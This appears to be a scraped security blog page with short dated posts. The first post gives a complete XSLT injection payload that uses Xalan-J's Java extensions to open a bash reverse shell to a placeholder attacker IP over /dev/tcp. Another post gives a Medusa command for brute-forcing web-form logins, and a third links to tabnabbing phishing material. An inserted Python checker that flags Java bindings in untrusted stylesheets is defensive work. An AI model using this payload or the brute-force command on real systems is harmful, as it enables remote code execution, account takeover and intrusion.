# apt-add-repository ppa:svn/ppa
# apt-get update
# apt-get dist-upgrade
16/01/13
11/01/13
XSLT OS command execution (reverse shell)
XSLT code injection
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:j="http://xml.apache.org/xalan/java" xmlns:runtime="xalan://java.lang.Runtime" version="1.0">
<xsl:output method="text"/>
<xsl:strip-space elements="*"/>
<xsl:variable name="rt" select="runtime:getRuntime()"/>
<xsl:variable name="unix_shell" select="'/bin/bash'"/>
<xsl:variable name="unix_option" select="'-c'"/>
<xsl:variable name="command" select="'0<&196;exec 196<>/dev/tcp/<attackerIP>/2222; sh <&196 >&196 2>&196'"/>
<xsl:variable name="separator" select="' ---Separator-- '"/>
<xsl:template match="/">
<xsl:variable name="tmp">
<xsl:value-of select="concat($unix_shell, $separator, $unix_option, $separator, $command)"/>
</xsl:variable>
<xsl:variable name="cmd" select="j:java.lang.String.new($tmp)"/>
<xsl:variable name="array" select="j:split($cmd, $separator)"/>
<xsl:variable name="proc" select="runtime:exec($rt, $array)"/>
</xsl:template>
</xsl:stylesheet>
References:
http://xhe.myxwiki.org/xwiki/bin/view/XSLT/Engine_XalanJ
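A defender-side check for the technique in this post, added here as an example and not part of the original post: it lists the namespace prefixes in an untrusted stylesheet that bind to Java classes in Xalan-J, and the extension calls made through them. The function names and the sample stylesheets are constructed for illustration.

```python
import io
import re
import xml.etree.ElementTree as ET

# Namespace URIs that bind a prefix to Java classes in Xalan-J. Both forms
# appear in the stylesheet above; the list is not exhaustive.
JAVA_NS = ("http://xml.apache.org/xalan/java", "xalan://")
NS_DECL = re.compile(r"""xmlns:([\w.-]+)\s*=\s*(["'])(.*?)\2""", re.S)
CALL = re.compile(r"\b([\w.-]+):([\w.]+)\s*\(")


def declared_namespaces(text):
    """Return (prefix, uri) pairs declared anywhere in the stylesheet."""
    if "<!doctype" not in text.lower():  # never hand a DTD to the parser
        try:
            src = io.BytesIO(text.encode("utf-8"))
            return [ns for _, ns in ET.iterparse(src, events=("start-ns",))]
        except ET.ParseError:
            pass  # not well-formed: fall back to a textual scan
    return [(m.group(1), m.group(3)) for m in NS_DECL.finditer(text)]


def java_bindings(text):
    """Prefixes that give the stylesheet access to Java classes."""
    return sorted({(p, u) for p, u in declared_namespaces(text)
                   if u.startswith(JAVA_NS)})


def java_calls(text):
    """Extension function calls made through those prefixes."""
    prefixes = {p for p, _ in java_bindings(text)}
    return sorted({f"{p}:{name}" for p, name in CALL.findall(text) if p in prefixes})


# Constructed samples (not taken from the page).
XSL = 'xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"'
CLEAN = f'<xsl:stylesheet {XSL}><xsl:output method="text"/></xsl:stylesheet>'
EXTENSION = (f'<xsl:stylesheet {XSL} xmlns:sys="xalan://java.lang.System">'
             '<xsl:template match="/">'
             '<xsl:value-of select="sys:currentTimeMillis()"/>'
             '</xsl:template></xsl:stylesheet>')
# Not well-formed (raw "<" in an attribute), so the regex fallback is used.
BROKEN = (f'<xsl:stylesheet {XSL} xmlns:j="http://xml.apache.org/xalan/java">'
          '<xsl:variable name="s" select="j:java.lang.String.new(\'a<b\')"/>')

if __name__ == "__main__":
    for name, doc in (("clean", CLEAN), ("extension", EXTENSION), ("broken", BROKEN)):
        print(name, java_bindings(doc), java_calls(doc))
```

A stylesheet that yields any binding can be rejected before it reaches the transformer, or routed for manual review.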
26/04/12
BruteForce with Medusa: web-form
An excellent alternative to THC-Hydra: Medusa
To brute-force a web form:
#./medusa -h [IP|host] -U file_utenze -P file_password.txt
-M web-form -m FORM:"path/page.php" -m DENY-SIGNAL:"testo in caso di deny"
-m FORM-DATA:"[post|get]?user=&pass=&login=login"
The following command lists the available modules that can be selected with the "-M" option:
#./medusa -d
25/03/12
TabNabbing
Tabnabbing using SET:
http://pentestlab.wordpress.com/2012/03/20/tabnabbing-attack-method/
Explanation and example of tabnabbing:
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
28/02/12